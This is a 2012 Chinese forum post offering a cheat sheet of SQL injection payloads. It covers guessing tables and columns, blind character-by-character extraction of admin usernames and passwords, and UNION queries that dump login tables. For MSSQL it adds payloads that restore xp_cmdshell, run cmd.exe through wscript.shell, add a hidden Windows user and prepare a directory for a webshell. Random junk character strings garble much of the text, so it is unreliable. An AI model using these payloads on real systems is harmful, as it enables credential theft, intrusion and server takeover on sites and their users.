标题: SQL注入语句2 [打印本页] 作者: admin 时间: 2012-9-15 14:32 标题: SQL注入语句2 1..判断有无注入点 & T8 ~* z0 e$ b7 l; and 1=1 and 1=2 0 N: d/ ~ a0 L1 _# W& r! P$ ^ J5 T7 h+ k' Y J3 ?
+ t: g5 _4 @2 S' T0 G2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 2 T% J, K; n8 K# V
and 0<>(select count(*) from *) - C- F8 y& m7 y/ j
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 6 ?- z3 p' v2 s 9 ]) L" q9 |0 B5 j 3 v% }+ h$ ~& p. p' ~3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 b1 K$ [4 J& V. L* pand 0<(select count(*) from admin) 0 e, r9 V3 O5 `4 k& ^7 }
and 1<(select count(*) from admin) $ H9 v+ O2 e, V8 c* G1 s
猜列名还有 and (select count(列名) from 表名)>0# p( N7 t: y7 `5 I
1 w* D$ S; p" s# ]3 d& _
/ ?6 `# _5 ~2 ?/ F, u3 K. V2 ^4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. ) P: n+ V( }. S% R x- h% xand 1=(select count(*) from admin where len(*)>0)-- - x9 a2 K' c& Y% T
and 1=(select count(*) from admin where len(用户字段名称name)>0) % b0 ]: @. D! v* B4 cand 1=(select count(*) from admin where len(密码字段名称password)>0) + g) Y Q6 ^9 h. z) x: [8 h
a( A! Q7 ~% N# L5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 3 S& @7 H! k4 Z7 V9 Qand 1=(select count(*) from admin where len(*)>0) 5 Q& _" r! u8 x1 o, F, I8 I- c2 Fand 1=(select count(*) from admin where len(name)>6) 错误 % K; S5 I! Z2 _' \7 Jand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 + B7 Z# a3 R3 @$ H4 ]
and 1=(select count(*) from admin where len(name)=6) 正确 ; x- D. o: ]. \
1 `& f9 T/ N. C% Q _. O+ e1 Q: r
and 1=(select count(*) from admin where len(password)>11) 正确 / h: `4 S& ?8 v) [2 c/ X: h0 qand 1=(select count(*) from admin where len(password)>12) 错误 长度是12 5 w8 ~$ T( z- n) Q
and 1=(select count(*) from admin where len(password)=12) 正确 }+ l5 [5 S/ X7 u" Z" w猜长度还有 and (select top 1 len(username) from admin)>59 ~& J! P/ W8 n
7 \2 w Z) l( F3 j0 I* I( z+ F : r7 D$ ?% z9 g4 |) c, Z( {2 r6.猜解字符 5 b9 X# i( Q% A, a9 aand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 ( o4 o* q1 y- G
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 6 g3 a; T1 Q) H( \9 m$ T
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 0 i x0 Z. e2 I. D. q5 O( P# ]
- G1 n- ]6 A" ]8 B% w猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算0 }5 T) K5 m: b
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 6 u) v8 V/ O. k
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. 7 J9 m% T& x; \. G& ? 1 R' j4 Z$ |* ?& r& l2 Jgroup by users.id having 1=1-- : D7 A3 _( y3 B* ]4 G! e1 V& w: i
group by users.id, users.username, users.password, users.privs having 1=1-- ' d* s" j |2 }* k5 U; \, Z
; insert into users values( 666, attacker, foobar, 0xffff )-- ! k: D! ?3 N/ D! }6 s7 a
" _1 I; Q6 a; YUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- $ O3 ~' ?- W' I, |; kUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- " _3 \8 d6 {* _/ _
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- 3 H+ k* N& z, a7 ?/ S- ?UNION SELECT TOP 1 login_name FROM logintable- 6 w m9 ?4 r9 D! i% J! w
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul-- 9 `! ?( j; x7 ~5 F5 _9 V
% I5 d [" S" z
看服务器打的补丁=出错了打了SP4补丁 7 a( D/ X% x6 K; n& [
and 1=(select @@VERSION)-- ( P! Y9 W$ |' T. z" a/ }0 `# W3 v $ ~2 j: F7 c) b2 t- J1 Z: D: I看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 # \7 z. Q) V. p( e; w `4 w9 w2 ?8 L
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- 8 p) |0 C0 ~& b9 E/ F
! {- `6 @( f1 G- U* e9 X判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) ( W6 \+ c) K, C7 j& r" y
and sa=(SELECT System_user)-- h2 B1 h' l0 H1 u2 ]
and user_name()=dbo-- 9 g2 q! m7 G9 V% oand 0<>(select user_name()-- 8 @1 y. W, {& T3 g. l0 q0 i
1 A+ G+ \& r+ z0 C) ?) y1 u0 y8 Y
看xp_cmdshell是否删除 : `: G7 v3 f# ]6 ], F% _( i% a
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- 9 O5 R- e. ?( g3 q( c, X9 W$ W* O! J& }
xp_cmdshell被删除,恢复,支持绝对路径的恢复 I9 p. J8 J( L3 `: o4 b, W/ `;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- " ~# h( z V) s& f;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- ; e3 @9 J/ m" q y
` e' g* v9 q7 N; p
反向PING自己实验 " {- |% B( O" \ q
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 8 Z2 M6 {: f& W, l; D9 Q( z
/ j. m3 s: y) `8 j$ j, V" h加帐号 ) m% G( j9 r0 H8 H3 a1 [
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- H2 I* N9 n1 v2 d, y* S, E& b5 B& [; _1 A' d4 I' ?/ O' [, u
创建一个虚拟目录E盘: 8 _( \+ |0 O! s4 e, N o" z) W;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- + p2 ?" B0 o Q$ ~4 |% T- Z' ?; e6 F) S2 s0 Z
访问属性:(配合写入一个webshell) & W( `( q3 V8 c' v @+ ^declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse + ^! o4 d6 W( s! I# N5 h# y' j
. ~; q3 a" T' ~3 }4 r0 _ $ G& t3 U% a, T+ pMSSQL也可以用联合查询 7 P6 x5 T _4 w. r, q?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 8 L$ M' M1 b: S& b* E; {
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) ( x% A5 V E3 n F- \$ U5 w; M* Y. l4 s8 E3 [" i+ Z: a